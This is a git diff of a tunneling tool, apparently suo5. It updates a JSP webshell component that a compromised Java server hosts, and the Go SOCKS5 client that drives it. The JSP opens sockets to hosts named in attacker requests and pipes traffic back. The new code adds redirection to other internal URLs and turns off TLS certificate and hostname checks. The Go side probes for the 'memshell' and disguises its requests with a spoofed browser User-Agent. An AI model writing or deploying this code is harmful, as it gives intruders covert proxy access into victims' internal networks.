verify + // ref: https://github.com/L-codes/Neo-reGeorg/blob/master/templates/NeoreGeorg.java + if (HttpsURLConnection.class.isInstance(conn)) { + ((HttpsURLConnection) conn).setHostnameVerifier(this); + SSLContext ctx = SSLContext.getInstance("SSL"); + ctx.init(null, new TrustManager[]{this}, null); + ((HttpsURLConnection) conn).setSSLSocketFactory(ctx.getSocketFactory()); + } + + Enumeration headers = request.getHeaderNames(); + while (headers.hasMoreElements()) { + String k = headers.nextElement(); + conn.setRequestProperty(k, request.getHeader(k)); + } + + OutputStream rout = conn.getOutputStream(); + rout.write(marshal(dataMap)); + rout.flush(); + rout.close(); + conn.getResponseCode(); + return conn; + } + + public boolean verify(String hostname, SSLSession session) { + return true; + } + + public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException { + } + + public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { + } + + public X509Certificate[] getAcceptedIssuers() { + return new X509Certificate[0]; + + } + } \ No newline at end of file diff --git a/assets/suo5.jsp b/assets/suo5.jsp index 92ec2e3..509b5bd 100644 --- a/assets/suo5.jsp +++ b/assets/suo5.jsp @@ -2,12 +2,15 @@ <%@ page import="java.util.HashMap" %> <%@ page import="java.nio.ByteBuffer" %> <%@ page import="java.io.*" %> -<%@ page import="java.net.Socket" %> -<%@ page import="java.net.InetSocketAddress" %> <%@ page import="java.util.Date" %> <%@ page import="java.util.Arrays" %> +<%@ page import="java.util.Enumeration" %> +<%@ page import="java.net.*" %> +<%@ page import="java.security.cert.X509Certificate" %> +<%@ page import="java.security.cert.CertificateException" %> +<%@ page import="javax.net.ssl.*" %> <%! - public class Suo5 implements Runnable { + public class Suo5 implements Runnable, HostnameVerifier, X509TrustManager { InputStream gInStream; OutputStream gOutStream; @@ -17,7 +20,7 @@ gOutStream = out; } - public void process(ServletRequest sReq, ServletResponse sResp) { + public void process(ServletRequest sReq, ServletResponse sResp) { HttpServletRequest request = (HttpServletRequest) sReq; HttpServletResponse response = (HttpServletResponse) sResp; String agent = request.getHeader("User-Agent"); @@ -36,13 +39,13 @@ return; } - if (contentType.equals("application/octet-stream")) { + if (contentType.equals("application/octet-stream")) { processDataBio(request, response); } else { processDataUnary(request, response); } } catch (Throwable e) { -// System.out.printf("process data error %s", e); +// System.out.printf("process data error %s\n", e); // e.printStackTrace(); } } @@ -165,14 +168,14 @@ if (kLen < 0) { throw new Exception("key len error"); } - buf = Arrays.copyOfRange(bs, i, i+kLen); + buf = Arrays.copyOfRange(bs, i, i + kLen); String key = new String(buf); i += kLen; if (i + 4 >= bs.length) { throw new Exception("value len error"); } - buf = Arrays.copyOfRange(bs, i, i+4); + buf = Arrays.copyOfRange(bs, i, i + 4); int vLen = bytesToU32(buf); i += 4; if (vLen < 0) { @@ -182,7 +185,7 @@ if (i + vLen > bs.length) { throw new Exception("value error"); } - byte[] value = Arrays.copyOfRange(bs, i, i+vLen); + byte[] value = Arrays.copyOfRange(bs, i, i + vLen); i += vLen; m.put(key, value); @@ -233,7 +236,7 @@ t.start(); readReq(reqReader, scOutStream); } catch (Exception e) { -// System.out.printf("pipe error, %s\n", e); +// System.out.printf("pipe error, %s\n", e); } finally { sc.close(); respOutStream.close(); @@ -243,7 +246,7 @@ } } - private void readSocket(InputStream inputStream, OutputStream outputStream) throws IOException { + private void readSocket(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws IOException { byte[] readBuf = new byte[1024 * 8]; while (true) { @@ -251,9 +254,11 @@ if (n <= 0) { break; } - byte[] dataTmp = Arrays.copyOfRange(readBuf, 0, 0+n); - byte[] finalData = marshal(newData(dataTmp)); - outputStream.write(finalData); + byte[] dataTmp = Arrays.copyOfRange(readBuf, 0, 0 + n); + if (needMarshal) { + dataTmp = marshal(newData(dataTmp)); + } + outputStream.write(dataTmp); outputStream.flush(); } } @@ -290,18 +295,34 @@ HashMap dataMap; dataMap = unmarshal(reader); + String clientId = new String(dataMap.get("id")); byte[] action = dataMap.get("ac"); if (action.length != 1) { resp.setStatus(403); return; } - /* - ActionCreate byte = 0x00 - ActionData byte = 0x01 - ActionDelete byte = 0x02 - ActionResp byte = 0x03 - */ + /* + ActionCreate byte = 0x00 + ActionData byte = 0x01 + ActionDelete byte = 0x02 + */ + byte[] redirectData = dataMap.get("r"); + boolean needRedirect = redirectData != null && redirectData.length > 0; + String redirectUrl = ""; + if (needRedirect) { + dataMap.remove("r"); + redirectUrl = new String(redirectData); + needRedirect = !isLocalAddr(redirectUrl); + } + // load balance, send request with data to request url + // action 0x00 need to pipe, see below + if (needRedirect && (action[0] == 0x01 || action[0] == 0x02)) { + HttpURLConnection conn = redirect(request, dataMap, redirectUrl); + conn.disconnect(); + return; + } + resp.setBufferSize(8 * 1024); OutputStream respOutStream = resp.getOutputStream(); if (action[0] == 0x02) { @@ -326,35 +347,49 @@ respOutStream.close(); return; } - + // 0x00 create new tunnel resp.setHeader("X-Accel-Buffering", "no"); String host = new String(dataMap.get("h")); int port = Integer.parseInt(new String(dataMap.get("p"))); - Socket sc; - try { - sc = new Socket(); - sc.connect(new InetSocketAddress(host, port), 5000); - } catch (Exception e) { - respOutStream.write(marshal(newStatus((byte) 0x01))); - respOutStream.flush(); - respOutStream.close(); - return; - } - - OutputStream scOutStream = sc.getOutputStream(); - ctx.setAttribute(clientId, scOutStream); - respOutStream.write(marshal(newStatus((byte) 0x00))); - respOutStream.flush(); - InputStream scInStream = sc.getInputStream(); + InputStream readFrom; + Socket sc = null; + HttpURLConnection conn = null; + + if (needRedirect) { + // pipe redirect stream and current response body + conn = redirect(request, dataMap, redirectUrl); + readFrom = conn.getInputStream(); + } else { + // pipe socket stream and current response body + try { + sc = new Socket(); + sc.connect(new InetSocketAddress(host, port), 5000); + readFrom = sc.getInputStream(); + ctx.setAttribute(clientId, sc.getOutputStream()); + respOutStream.write(marshal(newStatus((byte) 0x00))); + respOutStream.flush(); + } catch (Exception e) { + ctx.removeAttribute(clientId); + respOutStream.write(marshal(newStatus((byte) 0x01))); + respOutStream.flush(); + respOutStream.close(); + return; + } + } try { - readSocket(scInStream, respOutStream); + readSocket(readFrom, respOutStream, !needRedirect); } catch (Exception e) { -// System.out.printf("pipe error, %s", e); +// System.out.printf("pipe error, %s\n", e); // e.printStackTrace(); } finally { - sc.close(); + if (sc != null) { + sc.close(); + } + if (conn != null) { + conn.disconnect(); + } respOutStream.close(); ctx.removeAttribute(clientId); } @@ -362,12 +397,74 @@ public void run() { try { - readSocket(gInStream, gOutStream); + readSocket(gInStream, gOutStream, true); } catch (Exception e) { -// System.out.printf("read socket error, %s", e); +// System.out.printf("read socket error, %s\n", e); // e.printStackTrace(); } } + + boolean isLocalAddr(String url) throws Exception { + String ip = (new URL(url)).getHost(); + Enumeration nifs = NetworkInterface.getNetworkInterfaces(); + while (nifs.hasMoreElements()) { + NetworkInterface nif = nifs.nextElement(); + Enumeration addresses = nif.getInetAddresses(); + while (addresses.hasMoreElements()) { + InetAddress addr = addresses.nextElement(); + if (addr instanceof Inet4Address) + if (addr.getHostAddress().equals(ip)) + return true; + } + } + return false; + } + + HttpURLConnection redirect(HttpServletRequest request, HashMap dataMap, String rUrl) throws Exception { + String method = request.getMethod(); + URL u = new URL(rUrl); + HttpURLConnection conn = (HttpURLConnection) u.openConnection(); + conn.setRequestMethod(method); + conn.setConnectTimeout(3000); + conn.setDoOutput(true); + conn.setDoInput(true); + + // ignore ssl verify + // ref: https://github.com/L-codes/Neo-reGeorg/blob/master/templates/NeoreGeorg.java + if (HttpsURLConnection.class.isInstance(conn)) { + ((HttpsURLConnection) conn).setHostnameVerifier(this); + SSLContext ctx = SSLContext.getInstance("SSL"); + ctx.init(null, new TrustManager[]{this}, null); + ((HttpsURLConnection) conn).setSSLSocketFactory(ctx.getSocketFactory()); + } + + Enumeration headers = request.getHeaderNames(); + while (headers.hasMoreElements()) { + String k = headers.nextElement(); + conn.setRequestProperty(k, request.getHeader(k)); + } + + OutputStream rout = conn.getOutputStream(); + rout.write(marshal(dataMap)); + rout.flush(); + rout.close(); + conn.getResponseCode(); + return conn; + } + + public boolean verify(String hostname, SSLSession session) { + return true; + } + + public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException { + } + + public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { + } + + public X509Certificate[] getAcceptedIssuers() { + return new X509Certificate[0]; + } } %> <% diff --git a/ctrl/chunked.go b/ctrl/chunked.go index f875f45..b6953cc 100644 --- a/ctrl/chunked.go +++ b/ctrl/chunked.go @@ -14,7 +14,7 @@ import ( type fullChunkedReadWriter struct { id string reqBody io.WriteCloser - serverResp io.Reader + serverResp io.ReadCloser once sync.Once readBuf bytes.Buffer @@ -23,7 +23,7 @@ type fullChunkedReadWriter struct { } // NewFullChunkedReadWriter 全双工读写流 -func NewFullChunkedReadWriter(id string, reqBody io.WriteCloser, serverResp io.Reader) io.ReadWriter { +func NewFullChunkedReadWriter(id string, reqBody io.WriteCloser, serverResp io.ReadCloser) io.ReadWriter { return &fullChunkedReadWriter{ id: id, reqBody: reqBody, @@ -65,15 +65,16 @@ func (s *fullChunkedReadWriter) Read(p []byte) (n int, err error) { func (s *fullChunkedReadWriter) Write(p []byte) (n int, err error) { log.Debugf("write data, length: %d", len(p)) - body := buildBody(newActionData(s.id, p)) + body := buildBody(newActionData(s.id, p, "")) return s.reqBody.Write(body) } func (s *fullChunkedReadWriter) Close() error { s.once.Do(func() { defer s.reqBody.Close() - body := buildBody(newDelete(s.id)) + body := buildBody(newDelete(s.id, "")) _, _ = s.reqBody.Write(body) + _ = s.serverResp.Close() }) return nil } @@ -84,10 +85,11 @@ type halfChunkedReadWriter struct { client *http.Client method string target string - serverResp io.Reader + serverResp io.ReadCloser once sync.Once chunked bool baseHeader http.Header + redirect string readBuf bytes.Buffer readTmp []byte @@ -95,7 +97,8 @@ type halfChunkedReadWriter struct { } // NewHalfChunkedReadWriter 半双工读写流, 用发送请求的方式模拟写 -func NewHalfChunkedReadWriter(ctx context.Context, id string, client *http.Client, method, target string, serverResp io.Reader, baseHeader http.Header) io.ReadWriter { +func NewHalfChunkedReadWriter(ctx context.Context, id string, client *http.Client, method, target string, + serverResp io.ReadCloser, baseHeader http.Header, redirect string) io.ReadWriter { return &halfChunkedReadWriter{ ctx: ctx, id: id, @@ -107,6 +110,7 @@ func NewHalfChunkedReadWriter(ctx context.Context, id string, client *http.Clien readTmp: make([]byte, 16*1024), writeTmp: make([]byte, 8*1024), baseHeader: baseHeader, + redirect: redirect, } } @@ -140,7 +144,7 @@ func (s *halfChunkedReadWriter) Read(p []byte) (n int, err error) { } func (s *halfChunkedReadWriter) Write(p []byte) (n int, err error) { - body := buildBody(newActionData(s.id, p)) + body := buildBody(newActionData(s.id, p, s.redirect)) log.Debugf("send request, length: %d", len(body)) req, err := http.NewRequestWithContext(s.ctx, s.method, s.target, bytes.NewReader(body)) if err != nil { @@ -166,7 +170,7 @@ func (s *halfChunkedReadWriter) Write(p []byte) (n int, err error) { func (s *halfChunkedReadWriter) Close() error { s.once.Do(func() { - body := buildBody(newDelete(s.id)) + body := buildBody(newDelete(s.id, s.redirect)) req, err := http.NewRequestWithContext(s.ctx, s.method, s.target, bytes.NewReader(body)) if err != nil { log.Error(err) @@ -179,6 +183,7 @@ func (s *halfChunkedReadWriter) Close() error { return } _ = resp.Body.Close() + _ = s.serverResp.Close() }) return nil } diff --git a/ctrl/config.go b/ctrl/config.go index 7a8581c..4543f96 100644 --- a/ctrl/config.go +++ b/ctrl/config.go @@ -1,6 +1,11 @@ package ctrl -import "io" +import ( + "fmt" + "io" + "net/http" + "strings" +) type Suo5Config struct { Method string `json:"method"` @@ -10,18 +15,43 @@ type Suo5Config struct { Username string `json:"username"` Password string `json:"password"` Mode ConnectionType `json:"mode"` - UserAgent string `json:"ua"` BufferSize int `json:"buffer_size"` Timeout int `json:"timeout"` Debug bool `json:"debug"` UpstreamProxy string `json:"upstream_proxy"` + RedirectURL string `json:"redirect_url"` + RawHeader []string `json:"raw_header"` + Header http.Header `json:"-"` OnRemoteConnected func(e *ConnectedEvent) `json:"-"` OnNewClientConnection func(event *ClientConnectionEvent) `json:"-"` OnClientConnectionClose func(event *ClientConnectCloseEvent) `json:"-"` GuiLog io.Writer `json:"-"` } +func (s *Suo5Config) parseHeader() error { + s.Header = make(http.Header) + for _, value := range s.RawHeader { + if value == "" { + continue + } + parts := strings.SplitN(value, ":", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid header value %s", value) + } + s.Header.Set(parts[0], parts[1]) + } + return nil +} + +func (s *Suo5Config) headerString() string { + ret := "" + for k := range s.Header { + ret += fmt.Sprintf("\n%s: %s", k, s.Header.Get(k)) + } + return ret +} + func DefaultSuo5Config() *Suo5Config { return &Suo5Config{ Method: "POST", @@ -31,10 +61,11 @@ func DefaultSuo5Config() *Suo5Config { Username: "", Password: "", Mode: "auto", - UserAgent: "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3", BufferSize: 1024 * 320, Timeout: 10, Debug: false, UpstreamProxy: "", + RedirectURL: "", + RawHeader: []string{"User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3"}, } } diff --git a/ctrl/ctrl.go b/ctrl/ctrl.go index 3d55e6c..731559b 100644 --- a/ctrl/ctrl.go +++ b/ctrl/ctrl.go @@ -30,6 +30,11 @@ func Run(ctx context.Context, config *Suo5Config) error { log.SetLevel("debug") } + err := config.parseHeader() + if err != nil { + return err + } + tr := &http.Transport{ TLSClientConfig: &tls.Config{ InsecureSkipVerify: true, @@ -48,6 +53,13 @@ func Run(ctx context.Context, config *Suo5Config) error { log.Infof("using upstream proxy %v", proxy) tr.Proxy = http.ProxyURL(u) } + if config.RedirectURL != "" { + _, err := url.Parse(config.RedirectURL) + if err != nil { + return fmt.Errorf("failed to parse redirect url, %s", err) + } + log.Infof("using redirect url %v", config.RedirectURL) + } noTimeoutClient := &http.Client{ Transport: tr, Timeout: 0, @@ -66,21 +78,18 @@ func Run(ctx context.Context, config *Suo5Config) error { ForceReadAllBody: false, }) - log.Infof("ua: %s", config.UserAgent) + log.Infof("header: %s", config.headerString()) log.Infof("method: %s", config.Method) - baseHeader := http.Header{} - baseHeader.Set("User-Agent", config.UserAgent) - log.Infof("testing connection with remote server") - err := checkMemshell(normalClient, config.Method, config.Target, baseHeader.Clone()) + err = checkMemshell(normalClient, config.Method, config.Target, config.Header.Clone()) if err != nil { return err } log.Infof("connection to remote server successful") if config.Mode == AutoDuplex || config.Mode == FullDuplex { log.Infof("checking the capability of FullDuplex..") - if checkFullDuplex(config.Method, config.Target, baseHeader.Clone()) { + if checkFullDuplex(config.Method, config.Target, config.Header.Clone()) { config.Mode = FullDuplex log.Infof("wow, you can run the proxy on FullDuplex mode") } else { @@ -96,11 +105,10 @@ func Run(ctx context.Context, config *Suo5Config) error { fmt.Println() msg := "[Tunnel Info]\n" msg += fmt.Sprintf("Target: %s\n", config.Target) - msg += fmt.Sprintf("Proxy: socks5://%s\n", config.Listen) if config.NoAuth { - msg += "Auth: Not Set\n" + msg += fmt.Sprintf("Proxy: socks5://%s\n", config.Listen) } else { - msg += fmt.Sprintf("Auth: %s %s\n", config.Username, config.Password) + msg += fmt.Sprintf("Proxy: socks5://%s:%s@%s\n", config.Username, config.Password, config.Listen) } msg += fmt.Sprintf("Mode: %s\n", config.Mode) fmt.Println(pio.Rich(msg, pio.Green)) @@ -132,16 +140,12 @@ func Run(ctx context.Context, config *Suo5Config) error { } handler := &socks5Handler{ ctx: ctx, - method: config.Method, - target: config.Target, - mode: config.Mode, - bufSize: config.BufferSize, + config: config, normalClient: normalClient, noTimeoutClient: noTimeoutClient, rawClient: rawClient, pool: trPool, selector: selector, - baseHeader: baseHeader, } _ = srv.Serve(&ClientEventHandler{ Inner: handler, diff --git a/ctrl/handler.go b/ctrl/handler.go index 5d8566c..0ac8954 100644 --- a/ctrl/handler.go +++ b/ctrl/handler.go @@ -32,17 +32,13 @@ const ( ) type socks5Handler struct { + config *Suo5Config ctx context.Context - method string - target string normalClient *http.Client noTimeoutClient *http.Client rawClient *rawhttp.Client - bufSize int pool *sync.Pool selector gosocks5.Selector - mode ConnectionType - baseHeader http.Header } func (m *socks5Handler) Handle(conn net.Conn) error { @@ -71,23 +67,23 @@ func (m *socks5Handler) handleConnect(conn net.Conn, sockReq *gosocks5.Request) var err error var resp *http.Response - dialData := buildBody(newActionCreate(id, sockReq.Addr.Host, sockReq.Addr.Port)) + dialData := buildBody(newActionCreate(id, sockReq.Addr.Host, sockReq.Addr.Port, m.config.RedirectURL)) ch, chWR := netrans.NewChannelWriteCloser(m.ctx) defer chWR.Close() - baseHeader := m.baseHeader.Clone() + baseHeader := m.config.Header.Clone() - if m.mode == FullDuplex { + if m.config.Mode == FullDuplex { body := netrans.MultiReadCloser( ioutil.NopCloser(bytes.NewReader(dialData)), ioutil.NopCloser(netrans.NewChannelReader(ch)), ) - req, _ = http.NewRequestWithContext(m.ctx, m.method, m.target, body) + req, _ = http.NewRequestWithContext(m.ctx, m.config.Method, m.config.Target, body) baseHeader.Set("Content-Type", ContentTypeFull) req.Header = baseHeader resp, err = m.rawClient.Do(req) } else { - req, _ = http.NewRequestWithContext(m.ctx, m.method, m.target, bytes.NewReader(dialData)) + req, _ = http.NewRequestWithContext(m.ctx, m.config.Method, m.config.Target, bytes.NewReader(dialData)) baseHeader.Set("Content-Type", ContentTypeHalf) req.Header = baseHeader resp, err = m.noTimeoutClient.Do(req) @@ -131,10 +127,11 @@ func (m *socks5Handler) handleConnect(conn net.Conn, sockReq *gosocks5.Request) log.Infof("conn successfully connected to %s", sockReq.Addr) var streamRW io.ReadWriter - if m.mode == FullDuplex { + if m.config.Mode == FullDuplex { streamRW = NewFullChunkedReadWriter(id, chWR, resp.Body) } else { - streamRW = NewHalfChunkedReadWriter(m.ctx, id, m.normalClient, m.method, m.target, resp.Body, baseHeader) + streamRW = NewHalfChunkedReadWriter(m.ctx, id, m.normalClient, m.config.Method, m.config.Target, + resp.Body, baseHeader, m.config.RedirectURL) } defer streamRW.(io.Closer).Close() @@ -182,30 +179,38 @@ const ( ActionCreate byte = 0x00 ActionData byte = 0x01 ActionDelete byte = 0x02 - ActionResp byte = 0x03 ) -func newActionCreate(id, addr string, port uint16) map[string][]byte { +func newActionCreate(id, addr string, port uint16, redirect string) map[string][]byte { m := make(map[string][]byte) m["ac"] = []byte{ActionCreate} m["id"] = []byte(id) m["h"] = []byte(addr) m["p"] = []byte(strconv.Itoa(int(port))) + if len(redirect) != 0 { + m["r"] = []byte(redirect) + } return m } -func newActionData(id string, data []byte) map[string][]byte { +func newActionData(id string, data []byte, redirect string) map[string][]byte { m := make(map[string][]byte) m["ac"] = []byte{ActionData} m["id"] = []byte(id) m["dt"] = []byte(data) + if len(redirect) != 0 { + m["r"] = []byte(redirect) + } return m } -func newDelete(id string) map[string][]byte { +func newDelete(id string, redirect string) map[string][]byte { m := make(map[string][]byte) m["ac"] = []byte{ActionDelete} m["id"] = []byte(id) + if len(redirect) != 0 { + m["r"] = []byte(redirect) + } return m } diff --git a/gui/frontend/src/Home.vue b/gui/frontend/src/Home.vue index 326abaa..f29c84d 100644 --- a/gui/frontend/src/Home.vue +++ b/gui/frontend/src/Home.vue @@ -76,7 +76,7 @@ 连接数: {{ status.connection_count }} CPU: {{ status.cpu_percent }} 内存: {{ status.memory_usage }} - 版本: 0.3.0 + 版本: 0.4.0